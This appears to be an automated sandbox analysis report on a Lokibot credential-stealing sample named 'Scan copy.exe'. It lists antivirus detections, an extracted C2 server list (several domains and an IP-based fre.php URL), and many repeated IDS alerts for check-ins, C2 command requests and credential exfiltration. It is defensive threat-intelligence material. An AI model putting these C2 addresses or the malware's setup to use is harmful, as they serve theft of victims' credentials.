                2024-11-28T09:16:15.111182+010028257661Malware Command and Control Activity Detected192.168.2.75001294.156.177.4180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Scan copy.exeAvira: detected
                Source: 94.156.177.41/simple/five/fre.phpAvira URL Cloud: Label: malware
                Source: http://94.156.177.41/simple/five/fre.phpAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeAvira: detection malicious, Label: HEUR/AGEN.1307356
                Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
                Source: http://94.156.177.41/simple/five/fre.phpVirustotal: Detection: 17%Perma Link
                Source: 94.156.177.41/simple/five/fre.phpVirustotal: Detection: 17%Perma Link
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeReversingLabs: Detection: 23%
                Source: Scan copy.exeVirustotal: Detection: 32%Perma Link
                Source: Scan copy.exeReversingLabs: Detection: 23%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeJoe Sandbox ML: detected
                Source: Scan copy.exeJoe Sandbox ML: detected
                Source: Scan copy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Scan copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Scan copy.exeCode function: 4x nop then jmp 06C8D9B3h0_2_06C8D290
                Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exeCode function: 4x nop then jmp 0797CC1Eh13_2_0797C4FA

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49703 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49722 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49722 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49722 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49707 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49760 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49760 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49760 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49705 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49705 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49705 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49722 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49722 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49785 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49760 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49705 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49755 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49755 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49755 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49745 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49745 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49745 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49745 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49755 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49785 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49770 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49795 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49795 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49707 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49707 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49739 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49785 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49707 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49707 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49770
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49814 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49739
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49814 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49709 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49745 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49707
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49755 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49722
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49703 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49755
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49709 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49760 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49709 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49795 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49745
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49814 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49785 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49785 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49733 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49703 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49785
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49833 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49833 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49833 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49703 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49795 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49795 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49814 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49814 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49795
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49814
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49833 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49775 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49833 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49733 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49730 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49760
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49799 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49775
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49833
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49779 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49779 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49779 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49893 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49893 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49799
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49893 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49898 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49898 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49869 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49869 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49869 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49779 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49869 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49869 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49869
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49859 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49859 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49859 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49859 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49733 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49859 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49874 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49874 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49804
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49898 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49893 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49893 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49893
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49779 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49909 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49909 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49909 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49874 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49733 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49733 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49709
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49948 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49948 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49948 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49764
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49716 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49874 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49874 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49716 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49779
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49820 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49716 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49898 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49730
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49839 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49716 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49716 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49898 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49859
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49710 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49898
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49943 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49733
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49710 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49710 -> 94.156.177.41:80
